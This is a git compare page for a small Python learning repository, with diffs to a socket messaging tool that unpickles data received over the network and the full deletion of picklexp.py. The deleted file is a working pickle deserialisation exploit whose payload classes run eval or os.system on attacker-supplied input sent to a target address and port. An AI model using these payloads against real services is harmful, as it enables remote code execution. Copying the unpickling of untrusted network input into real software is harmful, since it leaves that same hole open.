alfred/LearningPy
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Compare commits

base: alfred:a99a207c34a7768ee06dd9133d1402e4aa02f408
Branches Tags
alfred:master
..
compare: alfred:b28c9925b9f5fe82f5ed0106701bbe70ad321483
Branches Tags
alfred:master

No commits in common. "a99a207c34a7768ee06dd9133d1402e4aa02f408" and "b28c9925b9f5fe82f5ed0106701bbe70ad321483" have entirely different histories.
a99a207c34 ... b28c9925b9

3 changed files with 17 additions and 131 deletions
Show Stats Expand all files Collapse all files

13
main.py
View File

@ -2,7 +2,7 @@
import networker as net import networker as net
import sys import sys
from threading import Thread from threading import Thread
#import traceback import traceback
translators = (net.PickleTranslate(), net.JSONTranslate()) translators = (net.PickleTranslate(), net.JSONTranslate())
@ -13,13 +13,6 @@ conn = None
allowFiles = False allowFiles = False
log = [] log = []
def listAsTypes(lin):
toret = "["
for x in lin:
toret += str(type(x)) + ", "
toret = toret[:-2]
return toret + "]"
def onConn(addr): def onConn(addr):
log.append(addr + " # Connection Established") log.append(addr + " # Connection Established")
@ -110,7 +103,7 @@ def main():
except Exception as e: except Exception as e:
print("Command Error!") print("Command Error!")
#print(traceback.format_exc()) print(traceback.format_exc())
exit exit
@ -127,7 +120,7 @@ if __name__ == "__main__":
if len(sys.argv) > 3: if len(sys.argv) > 3:
translator = translators[int(sys.argv[3]) - 1] translator = translators[int(sys.argv[3]) - 1]
else: else:
translator = translators[int(input("Enter the message translator position " + listAsTypes(translators) + " : ")) - 1] translator = translators[int(input("Enter the message translator position " + str(translators) + " : ")) - 1]
main() main()

30
networker.py
View File

@ -5,7 +5,7 @@ import socket
import time import time
from threading import Thread from threading import Thread
import base64 import base64
#import traceback import traceback
#Defines a message class that has a type, header and a body. #Defines a message class that has a type, header and a body.
class Message: class Message:
@ -15,30 +15,25 @@ class Message:
self.header = header self.header = header
if mtype == MTYPE_File: if mtype == MTYPE_File:
try: try:
f = open(header, "rb") f = open(header, "r")
try: try:
self.content = f.read() self.content = str(f.read())
except: except:
print("An issue writing the message for \"" + self.header + "\" occured.") print("An issue writing the message for \"" + self.header + "\" occured.")
f.close() f.close()
except: except:
print("An issue when opening a file for reading: \"" + self.header + "\" occured.") print("An issue when opening a file for reading: \"" + self.header + "\" occured.")
#print(traceback.format_exc())
else: else:
self.content = content self.content = content
def saveContent(self): def saveContent(self):
if self.mtype != MTYPE_File: pass if self.mtype != MTYPE_File: pass
try: try:
f = open(str(self.header), "wb") f = open(str(self.header), "w")
try: try:
if type(self.content) == bytes or type(self.content) == bytearray:
f.write(bytes(self.content)) f.write(bytes(self.content))
else:
f.write(bytes(self.content, encoding='utf-8'))
except: except:
print("An issue writing the message for \"" + str(self.header) + "\" occured.") print("An issue writing the message for \"" + str(self.header) + "\" occured.")
#print(traceback.format_exc())
f.close() f.close()
except: except:
print("An issue when opening a file for writing: \"" + str(self.header) + "\" occured.") print("An issue when opening a file for writing: \"" + str(self.header) + "\" occured.")
@ -47,7 +42,7 @@ class Message:
toReturn = {"mtype":self.mtype, "header":self.header, "ident__":"Message"} toReturn = {"mtype":self.mtype, "header":self.header, "ident__":"Message"}
if type(self.content) == bytes or type(self.content) == bytearray: if type(self.content) == bytes or type(self.content) == bytearray:
toReturn["contentb64"] = True toReturn["contentb64"] = True
toReturn["content"] = base64.b64encode(bytes(self.content)).decode('utf-8') toReturn["content"] = base64.b64encode(bytes(self.content)).decode()
else: else:
toReturn["contentb64"] = False toReturn["contentb64"] = False
toReturn["content"] = self.content toReturn["content"] = self.content
@ -74,13 +69,13 @@ class PickleTranslate:
try: try:
return pickle.dumps(m) return pickle.dumps(m)
except: except:
#print(traceback.format_exc()) print(traceback.format_exc())
return None return None
def fromString(self, b): def fromString(self, b):
try: try:
return pickle.loads(b) return pickle.loads(b)
except: except:
#print(traceback.format_exc()) print(traceback.format_exc())
return None return None
#JSON Translator for Message to and from bytes. #JSON Translator for Message to and from bytes.
@ -89,13 +84,13 @@ class JSONTranslate:
try: try:
return json.dumps(m.toDict()) return json.dumps(m.toDict())
except: except:
#print(traceback.format_exc()) print(traceback.format_exc())
return None return None
def fromString(self, b): def fromString(self, b):
try: try:
return MessageFromDict(json.loads(b)) return MessageFromDict(json.loads(b))
except: except:
#print(traceback.format_exc()) print(traceback.format_exc())
return None return None
#Connection class #Connection class
@ -105,19 +100,14 @@ class Connection:
threads = dict() threads = dict()
actives = dict() actives = dict()
def __init__(self, binder, translator, onconn, onrecv, onend): def __init__(self, binder, translator, onconn, onrecv, onend):
if binder != None:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind(binder) self.socket.bind(binder)
self.socket.listen(8) self.socket.listen(8)
else:
self.socket = None
self.translator = translator self.translator = translator
self.onconn = onconn self.onconn = onconn
self.onrecv = onrecv self.onrecv = onrecv
self.onend = onend self.onend = onend
def listener(self): def listener(self):
if self.socket == None:
return
while self.active: while self.active:
s, a = self.socket.accept() s, a = self.socket.accept()
ac = a[0] + ":" + str(a[1]) ac = a[0] + ":" + str(a[1])
@ -203,7 +193,7 @@ class Connection:
break break
time.sleep(0.0001) time.sleep(0.0001)
self.threads.clear() self.threads.clear()
if self.socket != None: self.socket.close() self.socket.close()
def addresses(self): def addresses(self):
if self.active: if self.active:

97
picklexp.py
View File

@ -1,97 +0,0 @@
#BSD 3-Clause, (C) Alfred Manville 2022
#Be RESPONSIBLE when using this!
import networker as net
import pickle
import sys
#import traceback
#Payloads:
#State payloads only work if the Object is available at the target
class ExpBase:
def __init__(self, data):
self.data = data
class StateBase(ExpBase):
def __getstate__(self):
return self.data
class StatePXP(StateBase):
def __setstate__(self, state):
self.data = state
print(self.data)
class ReducePXP(ExpBase):
def __reduce__(self):
return print, (self.data,)
class StateEXP(StateBase):
def __setstate__(self, state):
self.data = state
eval(self.data)
class ReduceEXP(ExpBase):
def __reduce__(self):
return eval, (self.data,)
class ReduceSXP(ExpBase):
def __reduce__(self):
import os
return os.system, (self.data,)
def listAsTypes(lin):
toret = "["
for x in lin:
toret += str(type(x)) + ", "
toret = toret[:-2]
return toret + "]"
payloads = (StatePXP(""), ReducePXP(""), StateEXP(""), ReduceEXP(""), ReduceSXP(""))
payload = None
taddr = ""
tport = 0
plid = 0
pldata = ""
def onx(a):
pass
def ony(a, m):
pass
def main():
conn = net.Connection(None, net.PickleTranslate(), onx, ony, onx)
print("Running Exploit @ " + taddr + ":" + str(tport))
print("Exploit: " + str(type(payload)) + " ; Data: " + pldata)
try:
conn.connect((taddr, tport))
print("Exploiting...")
conn.send(taddr+":"+str(tport), payload)
print("Exploited!")
except:
#print(traceback.format_exc())
pass
conn.close()
exit
if __name__ == "__main__":
print("Python PicklExp (C) Alfred Manville 2022 BSD-3-Clause")
if len(sys.argv) > 1:
taddr = sys.argv[1]
else:
taddr = input("Enter the target address: ")
if len(sys.argv) > 2:
tport = int(sys.argv[2])
else:
tport = int(input("Enter the target port: "))
if len(sys.argv) > 3:
plid = int(sys.argv[3]) - 1
else:
plid = int(input("Enter the payload position " + listAsTypes(payloads) + " : ")) - 1
if len(sys.argv) > 4:
pldata = sys.argv[4]
else:
pldata = input("Enter the payload data: ")
payload = payloads[plid]
payload.data = pldata
main()